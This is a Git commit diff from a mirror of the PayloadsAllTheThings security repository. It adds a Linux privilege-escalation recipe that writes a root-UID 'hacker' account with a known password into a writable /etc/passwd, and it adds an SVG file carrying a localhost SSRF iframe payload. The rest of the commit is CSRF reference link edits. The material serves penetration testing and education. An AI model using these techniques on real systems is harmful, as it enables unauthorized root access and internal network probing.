mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
Linux Privesc - /etc/passwd writable
This commit is contained in:
parent
aaaeb3f38e
commit
546ecd0e36
@ -93,12 +93,13 @@ xhr.send('{"role":admin}');
|
||||
|
||||
- [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/)
|
||||
- [Cross-Site Request Forgery (CSRF) - OWASP](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))
|
||||
- [Messenger.com CSRF that show you the steps when you check for CSRF](https://whitton.io/articles/messenger-site-wide-csrf/) by Jack Whitton
|
||||
- [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack)](https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/) by Florian Courtial
|
||||
- [Hacking PayPal Accounts with one click (Patched)](http://yasserali.com/hacking-paypal-accounts-with-one-click/) by Yasser Ali
|
||||
- [Add tweet to collection CSRF](https://hackerone.com/reports/100820) by vijay kumar
|
||||
- [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/) by phwd
|
||||
- [How i Hacked your Beats account ? Apple Bug Bounty](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/) by @aaditya_purani
|
||||
- [FORM POST JSON: JSON CSRF on POST Heartbeats API](https://hackerone.com/reports/245346) by Dr.Jones
|
||||
- [Messenger.com CSRF that show you the steps when you check for CSRF - Jack Whitton](https://whitton.io/articles/messenger-site-wide-csrf/)
|
||||
- [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial](https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/)
|
||||
- [Hacking PayPal Accounts with one click (Patched) - Yasser Ali](http://yasserali.com/hacking-paypal-accounts-with-one-click/)
|
||||
- [Add tweet to collection CSRF - vijay kumar](https://hackerone.com/reports/100820)
|
||||
- [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun - phwd](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/)
|
||||
- [How i Hacked your Beats account ? Apple Bug Bounty - @aaditya_purani](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/)
|
||||
- [FORM POST JSON: JSON CSRF on POST Heartbeats API - Dr.Jones](https://hackerone.com/reports/245346)
|
||||
- [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
|
||||
- [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
|
||||
- [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
|
||||
- [Cross-Site Request Forgery Attack - PwnFunction](https://www.youtube.com/watch?v=eWEgUcHPle0)
|
@ -29,6 +29,7 @@
|
||||
* [Doas](#doas)
|
||||
* [GTFOBins](#gtfobins)
|
||||
* [Wildcard](#wildcard)
|
||||
* [Writable /etc/passwd](#writable---etc---passwd)
|
||||
* [NFS Root Squashing](#nfs-root-squashing)
|
||||
* [Shared Library](#shared-library)
|
||||
* [ldconfig](#ldconfig)
|
||||
@ -297,6 +298,27 @@ tar cf archive.tar *
|
||||
Tool: [wildpwn](https://github.com/localh0t/wildpwn)
|
||||
|
||||
|
||||
## Writable /etc/passwd
|
||||
|
||||
First generate a password with one of the following commands
|
||||
|
||||
```powershell
|
||||
openssl passwd -1 -salt hacker hacker
|
||||
mkpasswd -m SHA-512 hacker
|
||||
python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
|
||||
```
|
||||
|
||||
Then add the user `hacker` and add the generated password.
|
||||
|
||||
```powershell
|
||||
hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash
|
||||
```
|
||||
|
||||
E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash`
|
||||
|
||||
You can now use the `su` command with `hacker:hacker`
|
||||
|
||||
|
||||
## NFS Root Squashing
|
||||
|
||||
When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it
|
||||
@ -376,7 +398,6 @@ int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp
|
||||
}
|
||||
```
|
||||
|
||||
|
||||
## Groups
|
||||
|
||||
### Docker
|
||||
@ -439,14 +460,14 @@ lxc start mycontainer
|
||||
lxc exec mycontainer /bin/sh
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)
|
||||
- [Privilege escalation via Docker - April 22, 2015 — Chris Foster](https://fosterelli.co/privilege-escalation-via-docker.html)
|
||||
- [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/)
|
||||
- [Privilege escalation via Docker - April 22, 2015 - Chris Foster](https://fosterelli.co/privilege-escalation-via-docker.html)
|
||||
- [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ - AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/)
|
||||
- [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/)
|
||||
- [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/)
|
||||
- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt)
|
||||
- [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/)
|
||||
- [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html)
|
||||
- [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html)
|
||||
- [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/)
|
9
Server Side Request Forgery/Files/ssrf_iframe.svg
Normal file
9
Server Side Request Forgery/Files/ssrf_iframe.svg
Normal file
@ -0,0 +1,9 @@
|
||||
<svg width="6000" height="6000">
|
||||
<g>
|
||||
<foreignObject width="6000" height="6000">
|
||||
<body xmlns="http://www.w3.org/1999/xhtml">
|
||||
<iframe src="http://localhost/"></iframe>
|
||||
</body>
|
||||
</foreignObject>
|
||||
</g>
|
||||
</svg>
|
After Width: | Height: | Size: 234 B |
Loading…
Reference in New Issue
Block a user